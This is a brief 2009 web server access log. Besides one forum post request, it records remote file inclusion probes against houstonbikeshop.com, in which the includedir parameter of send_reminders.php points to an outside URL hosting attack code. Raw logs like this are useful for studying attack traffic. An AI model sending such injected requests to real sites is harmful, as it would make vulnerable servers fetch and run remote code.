91.121.150.170 - - [10/Jul/2009:11:01:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
62.16.115.69 - - [10/Jul/2009:11:07:34 -0700] "GET /send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:07:34 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
